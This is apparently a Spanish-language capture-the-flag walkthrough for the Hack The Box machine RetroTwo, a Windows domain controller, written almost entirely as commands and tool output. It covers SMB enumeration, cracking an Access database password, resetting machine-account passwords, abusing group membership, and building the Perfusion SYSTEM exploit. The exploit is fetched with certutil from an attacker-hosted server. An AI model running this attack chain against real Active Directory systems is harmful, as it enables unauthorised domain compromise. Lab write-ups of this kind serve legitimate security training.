RetroTwo

#easy #windows

https://app.hackthebox.com/machines/685

Enumeración

sudo nmap -p- -sS --min-rate 5000 -Pn -n -vv 10.129.73.77 -oA allPorts

PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
3389/tcp  open  ms-wbt-server    syn-ack ttl 127
5722/tcp  open  msdfsr           syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
49154/tcp open  unknown          syn-ack ttl 127
49155/tcp open  unknown          syn-ack ttl 127
49157/tcp open  unknown          syn-ack ttl 127
49158/tcp open  unknown          syn-ack ttl 127
49164/tcp open  unknown          syn-ack ttl 127

nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,3389,5722,9389,49154,49155,49157,49158,49164 -sCV -Pn -n -vv 10.129.73.77 -oA openPortsServiceVersions

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Microsoft DNS 6.1.7601 (1DB15F75) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15F75)
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-23 15:02:04Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds  syn-ack ttl 127 Windows Server 2008 R2 Datacenter 7601 Service Pack 1 microsoft-ds (workgroup: RETRO2)
464/tcp   open  tcpwrapped    syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Service
| ssl-cert: Subject: commonName=BLN01.retro2.vl
| Issuer: commonName=BLN01.retro2.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2025-09-22T14:58:26
| Not valid after:  2026-03-24T14:58:26
| MD5:   6a03:d074:c48d:27ba:c101:a445:6b49:b5d8
| SHA-1: a135:a500:202d:d965:0b49:5188:1c1f:d6af:5470:7143
| -----BEGIN CERTIFICATE-----
| MIIC4jCCAcqgAwIBAgIQYyWlavHDh4ZCjXfBK4RlMzANBgkqhkiG9w0BAQUFADAa
| MRgwFgYDVQQDEw9CTE4wMS5yZXRybzIudmwwHhcNMjUwOTIyMTQ1ODI2WhcNMjYw
| MzI0MTQ1ODI2WjAaMRgwFgYDVQQDEw9CTE4wMS5yZXRybzIudmwwggEiMA0GCSqG
| SIb3DQEBAQUAA4IBDwAwggEKAoIBAQDBcyk53L7nG/DvEQXireK1yGl5gR8PYB4Y
| grxHDnvEOK3m1YyahSHNZL0nuzgPnF3YNPziHIcR3UEdM1nLkVi41nME/MNt19SL
| mGZpiFoBWQc79Q2KldjUy4mIdLsrx5SCPIec0jY5W5mOeuDP7ExkCcDraoVzECny
| OyWbPmG/qLTjVUdGZ+PJC5pHH0A0dcDg5qOn5dFwqaN38ehF4un45QlvF50kKJsq
| x+QcjJb9htzfssD/p6YZfS1btn1eWt9YfiErBTpCp7Jzu3HqMd8NFUG0b0MXDWqD
| h6j4iyCl4JQfjkfeYt0n22U8D9lWBSnVKekgP77xxoMUZurfyYstAgMBAAGjJDAi
| MBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQUF
| AAOCAQEAICLUw0GFyl69xs0u7B1qXPQ2GA39R7fWP3neq6AP6gat/L+vow761nq3
| seXgamUTWbS6iUtEh7kfDthO1peuGftUNAPiBvLWdLVURjMGJnfrIE8OZpsgsajw
| y+wYTnRaBH4w1l3qwcAuUYaNqyqCHLEj8PfntqqdDUO0i7EpH3v1NfLQHMKsNQye
| q6YUPv4/xTCbFu72GN8AM5gGHb5ChcDF8o1zyGMRpV062+q8snhAE+Zq1wLnHP2Y
| 9EykqhFXY0htZP696cSN+6hNjkXiB0Umw7WP7BQkEX+zJrqryt7VntPO2jphhrZh
| phJd00kKarw4bHLQ0g0IyFnfh3z+8Q==
|_-----END CERTIFICATE-----
|_ssl-date: 2025-09-23T15:03:36+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: RETRO2
|   NetBIOS_Domain_Name: RETRO2
|   NetBIOS_Computer_Name: BLN01
|   DNS_Domain_Name: retro2.vl
|   DNS_Computer_Name: BLN01.retro2.vl
|   Product_Version: 6.1.7601
|_  System_Time: 2025-09-23T15:02:57+00:00
5722/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49154/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49164/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: BLN01; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (Windows Server 2008 R2 Datacenter 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: BLN01
|   NetBIOS computer name: BLN01\x00
|   Domain name: retro2.vl
|   Forest name: retro2.vl
|   FQDN: BLN01.retro2.vl
|_  System time: 2025-09-23T17:02:59+02:00
| smb2-time: 
|   date: 2025-09-23T15:02:57
|_  start_date: 2025-09-23T14:57:40
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 29352/tcp): CLEAN (Timeout)
|   Check 2 (port 4817/tcp): CLEAN (Timeout)
|   Check 3 (port 29762/udp): CLEAN (Timeout)
|   Check 4 (port 53230/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
|_clock-skew: mean: -23m59s, deviation: 53m38s, median: 0s

Dominio: retro2.vl

nxc smb 10.129.73.77 -u guest -p '' --shares

SMB         10.129.73.77    445    BLN01            [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True) (Null Auth:True)
SMB         10.129.73.77    445    BLN01            [+] retro2.vl\guest: 
SMB         10.129.73.77    445    BLN01            [*] Enumerated shares
SMB         10.129.73.77    445    BLN01            Share           Permissions     Remark
SMB         10.129.73.77    445    BLN01            -----           -----------     ------
SMB         10.129.73.77    445    BLN01            ADMIN$                          Remote Admin
SMB         10.129.73.77    445    BLN01            C$                              Default share
SMB         10.129.73.77    445    BLN01            IPC$                            Remote IPC
SMB         10.129.73.77    445    BLN01            NETLOGON                        Logon server share 
SMB         10.129.73.77    445    BLN01            Public          READ            
SMB         10.129.73.77    445    BLN01            SYSVOL                          Logon server share

nxc smb 10.129.73.77 -u guest -p '' --share Public --get-file DB/staff.accdb staff.accdb

SMB         10.129.73.77    445    BLN01            [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True) (Null Auth:True)
SMB         10.129.73.77    445    BLN01            [+] retro2.vl\guest: 
SMB         10.129.73.77    445    BLN01            [*] Copying "DB/staff.accdb" to "staff.accdb"
SMB         10.129.73.77    445    BLN01            [+] File "DB/staff.accdb" was downloaded to "staff.accdb"

file staff.accdb
staff.accdb: Microsoft Access Database

office2john staff.accdb
staff.accdb:$office$*2013*100000*256*16*5736cfcbb054e749a8f303570c5c1970*1ec683f4d8c4e9faf77d3c01f2433e56*7de0d4af8c54c33be322dbc860b68b4849f811196015a3f48a424a265d018235

hashcat -m 9600 staffhash.txt /usr/share/wordlists/rockyou.txt
$office$*2013*100000*256*16*5736cfcbb054e749a8f303570c5c1970*1ec683f4d8c4e9faf77d3c01f2433e56*7de0d4af8c54c33be322dbc860b68b4849f811196015a3f48a424a265d018235:class08

bloodhound-ce-python -u 'ldapreader' -p 'ppYaVcB5R' -d retro2.vl --zip -c All -dc BLN01.retro2.vl -ns 10.129.73.77 -op ldapreader.zip

python3 rpcchangepwd.py retro2.vl/fs01\$:fs01@10.129.73.77 -newpass password
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Password was changed successfully.

nxc smb 10.129.73.77 -u 'fs01$' -p 'password'
SMB         10.129.73.77    445    BLN01            [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True) (Null Auth:True)
SMB         10.129.73.77    445    BLN01            [+] retro2.vl\fs01$:password

net rpc password 'ADMWS01$' password -U retro2.vl/'fs01$'%password -S BLN01.retro2.vl

nxc smb BLN01.retro2.vl -u 'ADMWS01$' -p 'password'
SMB         10.129.73.77    445    BLN01            [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True) (Null Auth:True)
SMB         10.129.73.77    445    BLN01            [+] retro2.vl\ADMWS01$:password

bloodyAD --host 10.129.73.77 -d retro2.vl -u 'ADMWS01$' -p 'password' add groupMember 'SERVICES' 'ldapreader'
[+] ldapreader added to SERVICES

xfreerdp3 /u:'ldapreader' /p:'ppYaVcB5R' /v:10.129.73.77 /w:1366 /h:768 /d:retro2.vl /tls:seclevel:0

En PowerShell

cd C:\
type user.txt

User flag

5117************************c5d8

https://github.com/itm4n/Perfusion

Instalar

MSVC v142 - VS 2019 C++ x64/x86 build tools
Windows 10 SDK

En Developer Command Prompt for VS 2022

C:\Perfusion-master\Perfusion-master>msbuild /t:Restore Perfusion.sln
C:\Perfusion-master\Perfusion-master>msbuild Perfusion.sln /p:Configuration=Release /p:Platform=x64

Transferir el ejecutable

Máquina víctima

PS C:\Users\ldapreader>certutil.exe -urlcache -f http://10.10.14.137:8000/Perfusion.exe Perfusion.exe

Máquina atacante

python3 -m http.server

Ejecutar Perfusion.exe

PS C:\Users\ldapreader> .\Perfusion -c cmd -i
[*] Created Performance DLL: C:\Users\LDAPRE~1\AppData\Local\Temp\2\performance_3228_3960_2.dll
[*] Created Performance registry key.
[*] Triggered Performance data collection.
[+] Exploit completed. Got a SYSTEM token! :)
[*] Waiting for the Trigger Thread to terminate... OK
[!] Failed to delete Performance registry key.
[*] Deleted Performance DLL.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\ldapreader>type C:\Users\administrator\Desktop\root.txt

Root flag

cb46************************8759

PreviousRetro NextRustyKey

Last updated 4 months ago

hashtagEnumeración

hashtagUser flag

hashtagRoot flag

Enumeración

User flag

Root flag